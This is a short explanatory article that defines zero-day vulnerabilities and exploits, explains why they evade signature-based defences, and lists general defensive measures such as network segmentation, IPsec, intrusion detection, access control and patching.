A zero-day vulnerability is a vulnerability in a system or device that has been disclosed but is not yet patched. An exploit that attacks a zero-day vulnerability is called a zero-day exploit.
Zero-day exploits provide a huge benefit to attackers because security defenses are built around known exploits, so targeted attacks based on zero-day exploits can go unnoticed for a long period of time. The success of a zero-day exploit attack depends on the vulnerability window—the time between an exploit’s discovery and its patch. Even a known vulnerability can have a lengthy vulnerability window, if its patch is difficult to develop. The larger the vulnerability window, the greater the chance of the attack going unnoticed—increasing its effectiveness.
Defending against zero-day attacks
Zero-day exploits are difficult to defend against because they are so difficult to detect. Vulnerability scanning software relies on malware signature checkers to compare suspicious code with signatures of known malware; when the malware uses a zero-day exploit that has not been previously encountered, such vulnerability scanners will fail to block the malware.
Since a zero-day vulnerability can’t be known in advance, there is no way to guard against a specific exploit before it happens. However, there are some things that companies can do to reduce their level of risk exposure.
- Use virtual local area networks to segregate some areas of the network or use dedicated physical or virtual network segments to isolate sensitive traffic flowing between servers.
- Implement IPsec, the IP security protocol, to apply encryption and authentication to network traffic.
- Deploy an IDS or IPS. Although signature-based IDS and IPS security products may not be able to identify the attack, they may be able to alert defenders to suspicious activity that occurs as a side effect to the attack.
- Use network access control to prevent rogue machines from gaining access to crucial parts of the enterprise environment.
- Lock down wireless access points and use a security scheme such as Wi-fi Protected Access 2 for maximum protection against wireless-based attacks.
- Keep all systems patched and up to date. Although patches will not stop a zero-day attack, keeping network resources fully patched may make it more difficult for an attack to succeed. When a zero-day patch does become available, apply it as soon as possible.
- Perform regular vulnerability scanning against enterprise networks and lock down any vulnerabilities that are discovered.
While maintaining a high standard for information security may not prevent all zero-day exploits, it can help defeat attacks that use zero-day exploits after the vulnerabilities have been patched.